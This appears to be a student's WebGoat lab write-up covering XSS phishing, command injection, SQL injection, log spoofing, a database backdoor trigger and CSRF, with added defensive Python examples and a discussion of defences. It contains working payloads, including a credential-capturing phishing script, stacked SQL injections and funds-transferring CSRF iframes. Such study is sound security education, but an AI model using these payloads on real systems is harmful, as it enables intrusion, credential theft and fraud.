20155229 "Network Countermeasure Technology" Exp9: Web Security Foundation

Source: Internet
Author: User
Tags: SQL injection attack, CSRF attack

Experimental content
    • Practice web attacks hands-on in WebGoat.
Experimental steps

WebGoat: WebGoat is a deliberately vulnerable web application developed by the OWASP organization for practice. It contains many vulnerabilities commonly found on the web, such as cross-site scripting, SQL injection, access control flaws, hidden fields, cookie handling, etc.

    • Run the command java -jar webgoat-container-7.0.1-war-exec.jar to start WebGoat.

    • Open WebGoat in the browser.
    • Address: localhost:8080/WebGoat

Cross-Site Scripting (XSS): Phishing with XSS (phishing attack)
    • In the search field, fill in a page fragment used for phishing:
</form>
<script>
    function hack(){
        XSSImage=new Image;
        XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
        alert(".....your information was stolen by lsq! User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
    }
</script>
<form name="phish">
<br><br><HR>
    <H2>please input your information here:</H2><br>
    <br>Enter Username:<br>
    <input type="text" name="user">
    <br>Enter Password:<br>
    <input type="password" name = "pass"><br>
    <input type="submit" name="login" value="login" onclick="hack()">
</form><br><br><HR>

After clicking Search, the injected form appears in the page.

Enter any user name and password.

After logging in, you will find that the information entered into the form has been captured and echoed back on the page.

Stored XSS Attacks
    • The XSS attack code is stored in the database and is executed every time a user opens the page, which makes it very harmful. It often appears on message boards: every time a user views the message, the attack is triggered, so an unexpected page or unexpected content is loaded when the user accesses it.

    • Enter any title.

    • In the message, enter <script>alert(" you have been attacked by tvxq !!");</script>

    • Submit by clicking Create post.

    • Click the link above; the attack succeeds.

Reflected XSS Attacks (reflected XSS)
    • Non-persistent: the user must be tricked into clicking a link to trigger the XSS code (the server does not store such a page or content). It commonly appears on search pages.
    • XSS occurs when unvalidated user input is used in an HTTP response. In a reflected XSS attack, an attacker crafts a URL containing the attack script and then posts it on another website, sends it by email, or otherwise gets the victim to click it.

Injection Flaws: Command Injection
    • Command injection attacks are a serious threat to any parameter-driven site. The technique behind this attack is simple and easy to learn, yet it can cause widespread damage and endanger the security of the system. Despite the incredible number of such risks, systems on the Internet remain vulnerable to this form of attack.

    • Start WebScarab. Select a page from the drop-down list on the lesson page, then click "View".

    • In the intercepted request, append "&netstat -an & ipconfig" to the requested page parameter. Then click View to see the result.

    • The response shows the usage of the network ports and the IP address.

Numeric SQL Injection (numeric SQL injection)
    • By injecting special characters into the station field, a new SQL statement can be composed.
    • SELECT * FROM weather_data WHERE station=[station]

    • The following form allows users to view weather data. View all weather data by injecting a SQL string.

    • Choose a city and click "GO".

    • Add "or 1=1" after the station number.

    • Once you have added it and clicked Go, you can see the weather data for all cities.

Log Spoofing (log spoofing)
    • Such attacks deceive the eyes of whoever reads the log file; attackers can use this method to cover their traces in the log.

    • In the username field, input fyh%0d%0aLogin Succeeded for username: admin, where %0d is a carriage return and %0a is a newline character.

    • The log shows the forged line; the attack was successful.
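How a log writer can neutralise the %0d%0a trick above, as an added example that is not part of the original lab. The log format and the function names are assumptions; the sample input is the lesson's own payload.

```python
from urllib.parse import unquote

# Constructed sample: the username exactly as the lesson submits it, URL-encoded,
# where %0d%0a (CR LF) starts a second, forged "Login Succeeded" line.
SPOOFED_INPUT = "fyh%0d%0aLogin Succeeded for username: admin"
DECODED_USERNAME = unquote(SPOOFED_INPUT)   # what the server sees after decoding


def naive_log_line(username: str) -> str:
    # Trusts the input: the embedded CR LF splits one entry into two lines.
    return "Login failed for username: " + username


def sanitize_for_log(value: str) -> str:
    # Turn CR and LF into visible escapes and drop other control characters, so
    # one input can only ever produce one log line while a reviewer can still
    # see what was attempted.
    out = []
    for ch in value:
        if ch == "\r":
            out.append("\\r")
        elif ch == "\n":
            out.append("\\n")
        elif ord(ch) < 0x20 or ch == "\x7f":
            continue
        else:
            out.append(ch)
    return "".join(out)


def safe_log_line(username: str) -> str:
    return "Login failed for username: " + sanitize_for_log(username)


def line_count(entry: str) -> int:
    # Number of lines a log reader would see for this single entry.
    return len(entry.splitlines())


def looks_spoofed(entry: str) -> bool:
    # Audit check over existing logs: a raw CR or LF inside one entry is suspect.
    return "\r" in entry or "\n" in entry
```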

String SQL Injection lab: SQL Injection (SQL injection) Stage 1: String SQL Injection
    • Bypass authentication with SQL injection.

    • Log in as user Neville, entering the SQL injection ' or 1=1 -- in the password field, but the login fails.
    • Using Inspect Element to view the source of the web page, the input box is found to limit the length of the input; the maximum allowed is only 8 characters. Change 8 to 40.

Now the login succeeds.

Stage 3: Numeric SQL Injection
    • The goal of this stage is to use an injected statement to navigate to information that could not otherwise be browsed: view the boss's account information from an ordinary employee's account.

    • Click ViewProfile to view the employee information.

    • Change the employee id value to 101 or 1=1 order by salary desc --
    • This way the records are ordered by salary in descending order, so the boss's record is ranked first.

Database Backdoors (database backdoor)
    • Enter 101 to get the user's information:

    • The input is not validated, so SQL injection is easy. To execute two statements, separate them with a semicolon. Enter the injection statement 101;update employee set salary=90000 .

    • Use the following input to add a trigger:

101;CREATE TRIGGER lsqBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='[email protected]' WHERE userid = NEW.userid

Blind Numeric SQL Injection (numeric blind injection)
    • The goal is to find the numeric value of the pin field in the record of the pins table whose cc_number field is 1111222233334444. The pin field type is int (integer).

101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );

    • This tests whether the pin value is greater than 10000.

    • Keep trying 5000, 2500, down to 1250, where the hint changes to "the account is valid".

Then try 2000, 2250, etc.

Open Burp Suite and set the proxy under Proxy -> Options.

Change the port number to 5229, click Add, then OK.

    • Set the browser's proxy: open "More" on the right side of the browser, click Preferences -> Advanced -> Network -> Settings, select the proxy option shown, and set the port number to the one you just configured.

When Burp Suite acts as an intermediary server, every packet flows through it. Return to the lesson and click Go, then return to Burp Suite, where the packet has already been captured.

In Positions, select Sniper mode; in Payloads, select the type Numbers, set the range to 2250-2500 with a step of 1; in Options, select Start Attack to start the attack.

The packet whose response size differs is found at the value 2364.

Enter 2364 in WebGoat; it is correct.

CSRF: Cross-Site Request Forgery (CSRF)
    • You can build a link by locating the screen and menu values in the parameters inserted on the right. Recipients of the CSRF mail who are authenticated at that time will transfer their funds. When the attack in this lesson succeeds, a green check mark appears next to the menu on the left.

    • In the message, enter

    • The value of screen and the value of menu are obtained by . Then set the width to 1 pixel and hide the image.

    • After submission, you will see a new message in the message list; click it.

    • The following message is loaded, achieving the purpose of the CSRF attack.

CSRF Prompt By-Pass
    • In Title, input: 5229
    • In Message, input:
<iframe
    src="attack?Screen=273&menu=900&transferFunds=5000"
    id="myFrame" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300"
    onload="document.getElementById('frame2').src='attack?Screen=280&menu=900&transferFunds=CONFIRM';">
</iframe>
<iframe
    id="frame2" frameborder="1" marginwidth="0"
    marginheight="0" width="800" scrolling=yes height="300">
</iframe>

    • The following result is obtained:

Answers to questions after the experiment

(1) SQL injection attack principle and how to defend against it
Principle:

SQL injection uses an existing application to inject malicious SQL commands into the back-end database engine for execution. By entering malicious SQL statements into a web form, the attacker reaches the database of a website that has a security vulnerability and ultimately tricks the server into executing the malicious SQL commands.

Defense:

Taking SQL injection as an example, it can be prevented with methods such as bind variables in Java. Java's bind-variable method treats the user's input as a variable and precompiles the SQL statement, so that at execution time the statement is not assembled sequentially; the input is handled as a variable rather than being concatenated dynamically into the SQL statement at run time, which prevents malicious attack code from being written into the SQL statement and then parsed and executed.
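A worked comparison of the concatenated queries from the numeric, string and blind SQL injection lessons above with their bind-variable counterparts, using an in-memory SQLite stand-in. This is an added example, not WebGoat's code; the tables, rows and passwords are constructed for illustration.

```python
import sqlite3

# Constructed in-memory stand-in for the lesson's tables (sample rows, not WebGoat's data).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE weather_data (station INTEGER, name TEXT, temp INTEGER);
        INSERT INTO weather_data VALUES (101, 'Columbia', 65), (102, 'Seattle', 48),
                                        (103, 'New York', 56);
        CREATE TABLE employee (userid INTEGER, last_name TEXT, password TEXT);
        INSERT INTO employee VALUES (101, 'Bartlett', 'pw101'), (112, 'Neville', 'secret');
    """)
    return conn


def weather_vulnerable(conn, station: str):
    # Concatenation: the input "101 or 1=1" becomes part of the WHERE clause,
    # so the condition is true for every row (the numeric lesson).
    return conn.execute("SELECT * FROM weather_data WHERE station=" + station).fetchall()


def weather_safe(conn, station: str):
    # Validate the type (int() raises ValueError on "101 or 1=1"), then pass the
    # value as a bind variable: the database receives one integer to compare,
    # never a fragment of SQL. The same holds for the blind-injection condition.
    return conn.execute("SELECT * FROM weather_data WHERE station=?",
                        (int(station),)).fetchall()


def login_vulnerable(conn, last_name: str, password: str):
    # Stage 1: the password "' or 1=1 --" closes the quote, appends an
    # always-true clause and comments out the closing quote.
    sql = ("SELECT userid FROM employee WHERE last_name='" + last_name
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, last_name: str, password: str):
    # Bind variables: quotes and "--" inside the password are plain characters.
    return conn.execute("SELECT userid FROM employee WHERE last_name=? AND password=?",
                        (last_name, password)).fetchall()


DB = make_db()
```

The 8-character limit that Stage 1 bypasses is a client-side maxlength, which is why the check that matters is the server-side one shown here.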

(2) XSS attack principle and how to defend against it

Principle:

XSS is one of the most common web attack methods. It works by injecting executable code into a web page and having the browser execute it successfully, achieving the attacker's goal and forming an effective XSS attack. Once the attack succeeds, it can obtain the user's contact list and then send fake scam messages to those contacts, delete the user's logs, and so on.

Defense:

- Filter the required parameters before the form is submitted or the URL parameters are passed.
- Filter user input: check whether the content entered by the user contains illegal content, such as <> (angle brackets), " (double quote), ' (single quote), % (percent sign), ; (semicolon), () (parentheses), & (ampersand), + (plus sign), etc.
- Strictly control output.
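The "strictly control output" point above as an added example (not from the lesson): output encoding for the HTML body and attribute contexts plus a Content-Security-Policy header, applied to the stored-XSS message from the lesson. The render and header function names are hypothetical.

```python
import html

# Constructed sample: the stored-XSS message body from the lesson.
PAYLOAD = '<script>alert(" you have been attacked by tvxq !!");</script>'


def render_unsafe(title: str, message: str) -> str:
    # Raw interpolation: whatever was stored in the database is sent back as markup.
    return "<h3>" + title + "</h3><p>" + message + "</p>"


def render_escaped(title: str, message: str) -> str:
    # Output encoding for the HTML body context: < > & and quotes become entities,
    # so the browser displays the text instead of executing it.
    return "<h3>" + html.escape(title) + "</h3><p>" + html.escape(message) + "</p>"


def render_link(url: str) -> str:
    # Attribute context needs more than entity encoding: a javascript: URL is
    # harmless as text but runs as an href, so restrict the scheme as well.
    if not url.lower().lstrip().startswith(("http://", "https://")):
        url = "#"
    return '<a href="' + html.escape(url, quote=True) + '">link</a>'


def security_headers() -> dict:
    # Defence in depth: a CSP without 'unsafe-inline' stops an inline <script>
    # even if an encoding bug slips through elsewhere in the page.
    return {"Content-Security-Policy": "default-src 'self'; script-src 'self'",
            "X-Content-Type-Options": "nosniff"}


def contains_script_tag(markup: str) -> bool:
    # Check used in the tests: would this markup introduce a script element?
    return "<script" in markup.lower()
```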

(3) CSRF attack principle and how to defend against it

Principle:

CSRF is logging in under someone else's name. The core of cross-site request forgery is stealing the user's Session, or rather the Cookie, because in the mainstream case the Session is stored in the Cookie. The attacker does not care about the victim's actual account and password, because once the user has logged in, the Session is the user's only credential; as long as the attacker can obtain the Session, he can impersonate the victim and enter the server.

Defense:

- Verify the HTTP Referer field.
- Add a token to the request address and verify it.
- Define custom attributes in the HTTP header and verify them.
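The token and Referer checks listed above as an added example (not WebGoat's code). The transfer handler, session id and request dictionaries are constructed; SITE_ORIGIN is assumed to be the lesson's localhost:8080, and the forged request mirrors the iframe from the CSRF Prompt By-Pass lesson.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = secrets.token_bytes(32)   # constructed; a real app loads this from config
SITE_ORIGIN = "http://localhost:8080"     # the lesson's WebGoat origin (assumed)


def csrf_token(session_id: str) -> str:
    # Synchronizer token bound to the login session: HMAC(secret, session id).
    # It is embedded in the legitimate form, never in a cookie, so a forged
    # request carries the session cookie but not the token.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def referer_ok(referer) -> bool:
    # "Verify the HTTP Referer field": it must be present and same-origin.
    if not referer:
        return False
    p = urlsplit(referer)
    return "{}://{}".format(p.scheme, p.netloc) == SITE_ORIGIN


def transfer_allowed(request: dict, session_id: str) -> bool:
    # A funds transfer is accepted only with a valid session-bound token and a
    # same-origin Referer; the checks are independent, so either failing rejects.
    token = request.get("params", {}).get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(session_id)):
        return False
    return referer_ok(request.get("headers", {}).get("Referer"))


# Constructed requests. The forged one is loaded from the message board on the
# same site, so its Referer is same-origin and the Referer check alone would
# pass; the missing token is what rejects it.
SESSION = "sess-5229"
FORGED = {"params": {"Screen": "273", "menu": "900", "transferFunds": "5000"},
          "headers": {"Referer": SITE_ORIGIN + "/WebGoat/attack"}}
LEGIT = {"params": {"Screen": "273", "menu": "900", "transferFunds": "5000",
                    "csrf_token": csrf_token(SESSION)},
         "headers": {"Referer": SITE_ORIGIN + "/WebGoat/attack"}}
```
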
Experiment Summary and experience
    • This experiment built on a previous experiment to understand SQL injection and XSS attacks more deeply. Although there are many attack methods, they are very interesting, and when I have the opportunity I will try again the topics I did not complete.
